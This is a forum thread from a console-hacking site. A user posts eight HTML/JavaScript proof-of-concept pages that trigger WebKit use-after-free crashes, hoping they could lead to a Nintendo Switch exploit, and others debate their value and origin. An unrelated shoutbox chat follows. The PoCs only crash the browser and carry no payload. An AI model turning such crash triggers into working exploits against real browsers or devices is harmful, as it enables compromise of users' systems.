Hacking Suggestion Webkit CVEs published on Nov. 22nd

ZiggyDeer

Active Member
OP
Newcomer
Joined
Dec 20, 2014
Messages
41
Trophies
0
Location
USA
Website
ziggydev.xyz
XP
304
Country
United States
Hello GBATemp! I recently discovered a whole bunch of proof-of-concept use-after-free exploits posted by the Google Security Team that target Apple Webkit. Since they are only about a week old in terms of their publication, I figured there hasn't been a patch for them on the Switch yet. I will put those POCs down at the bottom of this post.

Now, before you start bringing the hype up, I want to remind you that these are only proof-of-concepts, and will not do anything at the moment besides maybe crashing the browser. Not all use-after-free vulnerabilities can be used to gain privileges or anything like that, and there's also ARM TrustZone that you have to worry about. However, the folks over at Google did publish a total of 8 UAF exploits within WebKit, so maybe there is hope.

Let's hope a more experienced developer will try and pick this up. I've been trying to use QEMU to emulate an aarch64 Debian distro with a Cortex-a57 CPU, but it's just too slow. So I figured the better solution was to buy a Raspberry Pi 3 and debug on that, so that should come in on Thursday.

Anyways, here is the HTML/JS for the 8 POC exploits. I hope this can become useful!

HTML:
<script>
function jsfuzzer() {
  textarea1.setRangeText("foo");
  textarea2.autofocus = true;
  textarea1.name = "foo";
  form.insertBefore(textarea2, form.firstChild);
  form.submit();
}
function eventhandler2() {
  for(var i=0;i<100;i++) {
    var e = document.createElement("input");
    form.appendChild(e);
  }
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>
HTML:
<style>
.class9 { column-span: all; }
</style>
<script>
function f() {
  document.execCommand("indent", false);
  var var00031 = window.getSelection().setBaseAndExtent(sum,16,null,6);
  f();
}
</script>
<body onload=f()>
<pre style="column-count: 78; -webkit-user-modify: read-write">
<details>
<summary id="sum" class="class9">
<content id="htmlvar00040">
HTML:
<script>
function go() {
  iframe.name = "foo";
  var form = document.createElement("form");
  iframe.src = "data:text/html,foo";
  form.submit();
  window.onbeforeunload = f;
}
function f() {
  document.head.appendChild(del);
}
 
</script>
<body onload=go()>
<del id="del">
<iframe id="iframe"></iframe>
HTML:
<script>
function eventhandler1() {
try { txt.appendChild(kg); } catch(e) { }
}
 
function eventhandler2() {
try { anim.appendChild(kg); } catch(e) { }
}
 
function eventhandler3() {
try { table.scrollIntoView(true); } catch(e) { }
}
 
</script>
<table id="table"></table>
<form>
<keygen id="kg" autofocus="autofocus">
</form>
<svg>
<animate id="anim" attributeName="text-anchor" from="middle" to="inherit" onbegin="eventhandler1()" />
<text id="txt" onload="eventhandler3()">
<font color="white"></font>
<select onfocus="eventhandler2()" autofocus="autofocus">
<textarea>a</textarea>
<iframe onload="eventhandler1()"></iframe>
HTML:
<style>
#colgrp { display: table-footer-group; }
.class1 { text-transform: capitalize; display: -webkit-box; }
</style>
<script>
function go() {
  textarea.setSelectionRange(30,1);
  option.defaultSelected = true;
  col.setAttribute("aria-labeledby", "link");
}
</script>
<body onload=go()>
<link id="link">
<table>
<colgroup id="colgrp">
<col id="col" tabindex="1"></col>
<thead class="class1">
<th class="class1">
<textarea id="textarea" readonly="readonly"></textarea>
<option id="option"></option>
HTML:
<script>
function jsfuzzer() {
  circle.nearestViewportElement.innerHTML = "foo";
  document.execCommand("selectAll", false);
}
function eventhandler1() {
  clippath.appendChild(image);
}
function eventhandler2() {
  svg.appendChild(details);
}
function eventhandler3() {
  document.execCommand("fontName", false, "foo");
  button.autofocus = true;
  window.addEventListener("DOMNodeInserted", eventhandler2);
  div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
HTML:
<script>
function jsfuzzer() {
  circle.nearestViewportElement.innerHTML = "foo";
  document.execCommand("selectAll", false);
}
function eventhandler1() {
  clippath.appendChild(image);
}
function eventhandler2() {
  svg.appendChild(details);
}
function eventhandler3() {
  document.execCommand("fontName", false, "foo");
  button.autofocus = true;
  window.addEventListener("DOMNodeInserted", eventhandler2);
  div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
HTML:
<script>
function jsfuzzer() {
  circle.nearestViewportElement.innerHTML = "foo";
  document.execCommand("selectAll", false);
}
function eventhandler1() {
  clippath.appendChild(image);
}
function eventhandler2() {
  svg.appendChild(details);
}
function eventhandler3() {
  document.execCommand("fontName", false, "foo");
  button.autofocus = true;
  window.addEventListener("DOMNodeInserted", eventhandler2);
  div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
 
D

Deleted User

Guest
Hope to god a 4.01 exploit is announced but since it patches a big vulnerability to execute Homebrew most likely not and since this is a proof-of-concept it's a 50-50 chance that something will happen
 
Last edited by ,

Beerus

Gbatemp's God Of Destruction
Member
Joined
May 3, 2017
Messages
1,350
Trophies
0
Location
Universe 7
XP
2,322
Country
Japan
Hope to god a 4.01 exploit is announced but since it patches a big vulnerability to execute Homebrew most likely not and since this is a proof-of-concept it's a 50-50 chance that something will happen
highly doubt anything will happen soon but hey its not bad to keep on dreaming

--------------------- MERGED ---------------------------

coolio my dude
 
D

Deleted User

Guest
New CVEs come in heaploads on a constant basis. Copy pasting example PoCs from around the web and failing to mention it's not your code can also be kind of underhanded (especially with the way you posted this). And lastly, if someone randomly googling around and copy pasting other people's code on gbatemp is aware of a possible vulnerability, then it's already well known.


At least just post the link instead of formatting it make it seem like your work

https://www.exploit-db.com/exploits/43176/
 
Last edited by ,
  • Like
Reactions: Deleted User

MeowMeowMeow

S̈͊ͣ̎̍͋͟eͩ͊ͨ̂ͫ̐ͬ͟n̆ͨp͒ͪ̿̔aͤͬ̄ͩͨ͗̔iͧ̽ͤ
Member
Joined
Apr 1, 2016
Messages
570
Trophies
0
Age
33
Location
D̀͌̀e̵ͧk̷u̾̂ͨ͗̾͊̚ ͥ̈ͤ̎̒̓T͊ͬ͜rͨ̌̔͂́e͂̌ͩͦ̃͜eͬͪ̄͝
XP
1,094
Country
Netherlands
New CVEs come in heaploads on a constant basis. Copy pasting example PoCs from around the web and failing to mention it's not your code can also be kind of underhanded (especially with the way you posted this). And lastly, if someone randomly googling around and copy pasting other people's code on gbatemp is aware of a possible vulnerability, then it's already well known.


At least just post the link instead of formatting it make it seem like your work

https://www.exploit-db.com/exploits/43176/

Dude read his first sentence.. calm down lmao he is not stealing someones work. Ooooh the irony tho.
Hello GBATemp! I recently discovered a whole bunch of proof-of-concept use-after-free exploits posted by the Google Security Team that target Apple Webkit. Since they are only about a week old in terms of their publication, I figured there hasn't been a patch for them on the Switch yet. I will put those POCs down at the bottom of this post.
 
Last edited by MeowMeowMeow,
  • Like
Reactions: Cybernatus and Joom

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
  • RedColoredStars @ RedColoredStars:
    either you have usb C and no one else does, or everone else has usb c except you. haha
    +1
  • Xdqwerty @ Xdqwerty:
    @RedColoredStars, i don't have usb c
  • RedColoredStars @ RedColoredStars:
    That happened to me for like a year. lol. I was the only one of all my friends and family to still have an old phone.
  • Xdqwerty @ Xdqwerty:
    @RedColoredStars, my phone is from around 2019
  • RedColoredStars @ RedColoredStars:
    Mine was from 2017. lolol. I just got this new one like 6 months ago. Not even new, second hand cheapo $40 phone. But it has usb c. lol
  • RedColoredStars @ RedColoredStars:
    I cant justify $1k+ on a nice ass phone. I can spend that on a 75" tv screen. Why a 6" screen device cost me the same? lol
    +2
  • BigOnYa @ BigOnYa:
    I had a iPhone 5 for like 6 years, till last year, and had to get new phone, when phone companies stop using the cdna networks, which the iphone5 used.
  • K3Nv2 @ K3Nv2:
    A phone can do more than a TV
    +2
  • BigOnYa @ BigOnYa:
    These smart TVs are getting close tho. Gonna be like "back to future" TVs before long.
    +1
  • K3Nv2 @ K3Nv2:
    Nah a phones going to always be more powerful than a TV if the TVs $2grand maybe but why when I can put a smaller device in my pocket that does basically everything a TV already does
    +1
  • K3Nv2 @ K3Nv2:
    I can justify a decent $800 smartphone that'll last 3 years when I could get a 65" TV for $400 and buy a decent micro computer for $100 more
  • K3Nv2 @ K3Nv2:
    Tbf there are decent $400 smartphones in today's market that make top end spec phones unjust it's just what you want
  • Xdqwerty @ Xdqwerty:
    Found a Charger that works with my phone
    +1
  • Psionic Roshambo @ Psionic Roshambo:
    Yeah Ken I have 3 Samsung Phones now and honestly all 3 feel about the same
  • Psionic Roshambo @ Psionic Roshambo:
    A35 a S23 FE S24 Ultra lol
  • Psionic Roshambo @ Psionic Roshambo:
    Camera is about the only thing that legit separates them, unless you play games on your phone....
  • K3Nv2 @ K3Nv2:
    I honestly just download movies on my phone put them on my card reader then on my tv so much better than wireless transfer bs
  • K3Nv2 @ K3Nv2:
    Glad I bought a card reader type c and usb A makes life easy
  • Xdqwerty @ Xdqwerty:
    Yawn
  • RedColoredStars @ RedColoredStars:
    i download movies on my PC that is connected to my living room tv.
  • RedColoredStars @ RedColoredStars:
    Monitors are too small for my bad eyesight so I use my main tv and wirelss keyboard and wireless trackball mouse.
  • RedColoredStars @ RedColoredStars:
    I tried wireless transfer on phone before and yes, it's garbage. lol. So sloooooooooowwwwww.
  • BigOnYa @ BigOnYa:
    New south park was not really that funny.
  • Xdqwerty @ Xdqwerty:
    @BigOnYa, i heard modern south park is too serious
    Xdqwerty @ Xdqwerty: @BigOnYa, i heard modern south park is too serious